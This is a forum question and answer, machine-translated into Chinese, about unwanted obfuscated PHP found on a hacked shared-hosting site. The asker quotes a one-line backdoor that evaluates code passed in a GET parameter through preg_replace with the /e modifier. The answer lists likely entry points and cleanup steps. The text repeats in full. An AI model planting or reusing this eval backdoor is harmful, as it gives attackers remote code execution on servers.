不需要的 php 代码出现在我的一些脚本中
undesirable php code appeared on some of my scripts
我有一个常规托管计划的系统,公司没有钱购买云计划,所以我用这个开始,他们现在正计划改为专用服务。
它是一个 php + mysql 简单的系统,可以跟踪一些用户并生成邮件列表和其他一些东西。
问题是在某些文件中我看到了我没有输入的代码...我无法理解代码的内容所以我在这里向您展示:
$khg= '_'."GE".'T';if (!empty(${$khg}['15'])) preg_replace('~.*~e', "e".'V'.'al($'.$khg.'["15"])','');
有人知道这是怎么回事吗?
ps: hosting也有一个wordpress(公司主站)。研究我已经看到这可能是一些 php 使用 wordpress 失败的注入(在一些 wordpress 文件上我也看到了代码)。但是我没有找到太多资料...
提前谢谢大家!
您的网站可能被入侵的方式有多种:
- sql注入
- 密码泄露
- 计算机上的恶意软件具有 FTP 帐户密码
如果没有更多信息,我们无法确切知道是如何发生的,但这些都是非常常见的妥协向量。
您说您有一个 "simple PHP + MySQL system" 可以执行任务。查看 PHP 代码中处理输入的所有位置。你给他们消毒了吗? (您可以进行 Google 搜索以了解更多相关信息。)即使是一个未经处理的输入也可能成为坏人的后门。
清理代码、升级 Wordpress 等后,记得进行与密码相关的剩余清理工作:
- 更改您的数据库访问密码(和用户 ID)
- 更改 "admin" 用户名和密码(如果您的邮件列表系统有)。
- 更改您的 FTP 密码
- 等
我有一个常规托管计划的系统,公司没有钱购买云计划,所以我用这个开始,他们现在正计划改为专用服务。
它是一个 php + mysql 简单的系统,可以跟踪一些用户并生成邮件列表和其他一些东西。
问题是在某些文件中我看到了我没有输入的代码...我无法理解代码的内容所以我在这里向您展示:
$khg= '_'."GE".'T';if (!empty(${$khg}['15'])) preg_replace('~.*~e', "e".'V'.'al($'.$khg.'["15"])','');
有人知道这是怎么回事吗?
ps: hosting也有一个wordpress(公司主站)。研究我已经看到这可能是一些 php 使用 wordpress 失败的注入(在一些 wordpress 文件上我也看到了代码)。但是我没有找到太多资料...
提前谢谢大家!
您的网站可能被入侵的方式有多种:
- sql注入
- 密码泄露
- 计算机上的恶意软件具有 FTP 帐户密码
如果没有更多信息,我们无法确切知道是如何发生的,但这些都是非常常见的妥协向量。
您说您有一个 "simple PHP + MySQL system" 可以执行任务。查看 PHP 代码中处理输入的所有位置。你给他们消毒了吗? (您可以进行 Google 搜索以了解更多相关信息。)即使是一个未经处理的输入也可能成为坏人的后门。
清理代码、升级 Wordpress 等后,记得进行与密码相关的剩余清理工作:
- 更改您的数据库访问密码(和用户 ID)
- 更改 "admin" 用户名和密码(如果您的邮件列表系统有)。
- 更改您的 FTP 密码
- 等